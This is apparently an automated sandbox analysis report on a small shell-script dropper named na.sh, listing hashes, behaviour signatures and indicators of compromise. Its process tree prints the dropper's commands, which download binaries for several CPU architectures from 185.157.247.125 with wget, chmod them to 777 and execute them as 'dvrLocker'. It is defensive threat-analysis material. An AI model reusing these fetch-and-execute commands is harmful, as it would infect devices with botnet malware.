Analysis
-
max time kernel
149s -
max time network
164s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
10-10-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
na.sh
-
Size
372B
-
MD5
6b2644c0adca68c54a53a79842eb3b3c
-
SHA1
d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
-
SHA256
89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
-
SHA512
943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 686 chmod 697 chmod 665 chmod 676 chmod 681 chmod -
Deletes itself 1 IoCs
pid Process 682 dvrLocker -
Executes dropped EXE 5 IoCs
ioc pid Process /dvrLocker 666 dvrLocker /dvrLocker 677 dvrLocker /dvrLocker 682 dvrLocker /dvrLocker 692 dvrLocker /dvrLocker 702 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 168.235.111.72 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 4 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/300/maps dvrLocker File opened for reading /proc/304/maps dvrLocker File opened for reading /proc/593/maps dvrLocker File opened for reading /proc/594/maps dvrLocker -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 682 dvrLocker -
description ioc Process File opened for reading /proc/987/cmdline dvrLocker File opened for reading /proc/21/cmdline dvrLocker File opened for reading /proc/688/cmdline dvrLocker File opened for reading /proc/705/cmdline dvrLocker File opened for reading /proc/739/cmdline dvrLocker File opened for reading /proc/934/cmdline dvrLocker File opened for reading /proc/694/cmdline dvrLocker File opened for reading /proc/864/cmdline dvrLocker File opened for reading /proc/909/status dvrLocker File opened for reading /proc/995/cmdline dvrLocker File opened for reading /proc/1003/cmdline dvrLocker File opened for reading /proc/166/cmdline dvrLocker File opened for reading /proc/784/cmdline dvrLocker File opened for reading /proc/874/cmdline dvrLocker File opened for reading /proc/952/cmdline dvrLocker File opened for reading /proc/967/cmdline dvrLocker File opened for reading /proc/919/cmdline dvrLocker File opened for reading /proc/947/cmdline dvrLocker File opened for reading /proc/961/cmdline dvrLocker File opened for reading /proc/13/cmdline dvrLocker File opened for reading /proc/266/cmdline dvrLocker File opened for reading /proc/735/cmdline dvrLocker File opened for reading /proc/770/status dvrLocker File opened for reading /proc/825/status dvrLocker File opened for reading /proc/585/cmdline dvrLocker File opened for reading /proc/686/cmdline dvrLocker File opened for reading /proc/963/cmdline dvrLocker File opened for reading /proc/9/cmdline dvrLocker File opened for reading /proc/779/cmdline dvrLocker File opened for reading /proc/826/cmdline dvrLocker File opened for reading /proc/857/cmdline dvrLocker File opened for reading /proc/908/cmdline dvrLocker File opened for reading /proc/767/cmdline dvrLocker File opened for reading /proc/976/cmdline dvrLocker File opened for reading /proc/mounts dvrLocker File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/3/cmdline dvrLocker File opened for reading /proc/146/cmdline dvrLocker File opened for reading /proc/755/cmdline dvrLocker File opened for reading /proc/892/cmdline dvrLocker File opened for reading /proc/921/cmdline dvrLocker File opened for reading /proc/933/cmdline dvrLocker File opened for reading /proc/758/cmdline dvrLocker File opened for reading /proc/765/cmdline dvrLocker File opened for reading /proc/849/cmdline dvrLocker File opened for reading /proc/887/cmdline dvrLocker File opened for reading /proc/890/cmdline dvrLocker File opened for reading /proc/991/cmdline dvrLocker File opened for reading /proc/695/cmdline dvrLocker File opened for reading /proc/792/cmdline dvrLocker File opened for reading /proc/812/cmdline dvrLocker File opened for reading /proc/823/status dvrLocker File opened for reading /proc/1000/cmdline dvrLocker File opened for reading /proc/768/status dvrLocker File opened for reading /proc/25/cmdline dvrLocker File opened for reading /proc/700/cmdline dvrLocker File opened for reading /proc/731/cmdline dvrLocker File opened for reading /proc/867/cmdline dvrLocker File opened for reading /proc/998/cmdline dvrLocker File opened for reading /proc/871/cmdline dvrLocker File opened for reading /proc/954/cmdline dvrLocker File opened for reading /proc/18/cmdline dvrLocker File opened for reading /proc/642/cmdline dvrLocker File opened for reading /proc/714/cmdline dvrLocker -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 669 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/0 na.sh
Processes
-
/tmp/na.sh/tmp/na.sh1⤵
- Writes file to tmp directory
PID:643 -
/bin/rmrm -rf dvrLocker2⤵PID:645
-
-
/usr/bin/wgetwget http://185.157.247.125/c/empsl -O -2⤵PID:647
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:665
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:666
-
-
/usr/bin/wgetwget http://185.157.247.125/c/emips -O -2⤵
- System Network Configuration Discovery
PID:669
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:676
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:677
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm -O -2⤵PID:679
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:681
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Deletes itself
- Executes dropped EXE
- Reads process memory
- Changes its process name
- Reads runtime system information
PID:682
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm7 -O -2⤵PID:684
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:686
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:692
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:692
-
-
/usr/bin/wgetwget http://185.157.247.125/c/ex86 -O -2⤵PID:695
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:697
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:702
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:702
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5300cd530fb0a7f7cf6db875f68c0483e
SHA1a4bce294dc142fb1354e917bed4d58c98f381850
SHA256a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885
SHA512656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1
-
Filesize
41KB
MD53cfc76868e26201ac03e0583b7c8aaba
SHA103436d9d090e1f944fecf60adc1e45f90df20c26
SHA2568c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA51284add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2
-
Filesize
40KB
MD5c0b34d8a59f793b636b5424b8e96a64a
SHA1d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA51257446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4